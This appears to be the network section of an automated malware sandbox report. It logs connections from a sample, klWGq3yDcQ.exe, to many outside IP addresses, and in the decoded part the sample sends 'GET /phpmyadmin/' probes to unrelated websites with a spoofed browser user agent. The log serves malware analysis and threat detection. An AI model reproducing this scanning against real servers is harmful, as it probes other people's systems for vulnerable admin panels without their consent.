                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    515192.168.2.45118452.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    516192.168.2.4511963.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    517192.168.2.451256185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    518192.168.2.45121115.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    519192.168.2.45120234.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    520192.168.2.45132713.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    521192.168.2.45134172.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    522192.168.2.45137915.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    523192.168.2.4511803.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    524192.168.2.45144913.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    525192.168.2.45172754.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    526192.168.2.45165892.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    527192.168.2.45207666.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    528192.168.2.45206095.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    529192.168.2.452184185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    530192.168.2.45218281.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    531192.168.2.45224734.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    532192.168.2.452295172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    533192.168.2.452260194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    534192.168.2.45227274.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    535192.168.2.452291199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    536192.168.2.452328199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    537192.168.2.45233881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    538192.168.2.452356185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    539192.168.2.452382185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    540192.168.2.45246266.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    541192.168.2.452404120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    542192.168.2.45248099.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    543192.168.2.452468139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    544192.168.2.452502144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    545192.168.2.45253223.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    546192.168.2.45257095.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    547192.168.2.45256218.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    548192.168.2.452568117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    549192.168.2.452732162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    550192.168.2.45289654.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    551192.168.2.45270015.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    552192.168.2.45269892.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    553192.168.2.45270434.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    554192.168.2.452942172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    555192.168.2.452848185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    556192.168.2.45290018.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    557192.168.2.453069185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    558192.168.2.45307981.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    559192.168.2.45310795.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    560192.168.2.45318881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    561192.168.2.45321992.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    562192.168.2.453230185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    563192.168.2.453306120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    564192.168.2.45550223.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    565192.168.2.45558092.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    566192.168.2.45564818.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    567192.168.2.45570599.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    568192.168.2.45572581.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    569192.168.2.455722194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    570192.168.2.455863104.21.63.202806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    571192.168.2.45578095.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    572192.168.2.45575695.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    573192.168.2.45582381.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    574192.168.2.455804194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    575192.168.2.456065199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    576192.168.2.456052185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    577192.168.2.456057185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    578192.168.2.456097139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    579192.168.2.45612015.236.29.10680
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    580192.168.2.455763164.52.221.51806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    581192.168.2.4560983.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    582192.168.2.45616492.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    583192.168.2.456096120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    584192.168.2.45626966.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    585192.168.2.456272199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    586192.168.2.45630174.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    587192.168.2.456345185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    588192.168.2.456347185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    589192.168.2.45635881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    590192.168.2.45637881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    591192.168.2.456380117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    592192.168.2.456448194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    593192.168.2.456464185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    594192.168.2.45649695.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    595192.168.2.45672881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    596192.168.2.456770185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    597192.168.2.4567883.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    598192.168.2.45687981.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    599192.168.2.45689318.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    600192.168.2.456914185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    601192.168.2.457179185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    602192.168.2.45719181.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    603192.168.2.457202117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    604192.168.2.457363194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    605192.168.2.45743981.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    606192.168.2.4574553.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    607192.168.2.457462120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    608192.168.2.45789518.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    609192.168.2.458172117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    610192.168.2.458605117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    611192.168.2.459180104.21.63.202806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.45035035.237.190.1564436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: krkconcord.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC166INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-Encoding
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.450256162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: directlendersllc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC383INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 37 30 37 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 38 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 20 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closecontent-type: text/htmlcontent-length: 707date: Sun, 26 Nov 2023 05:59:28 GMTserver: LiteSpeedlocation: https://mydirectlender.com/phpmyadmin/alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=259
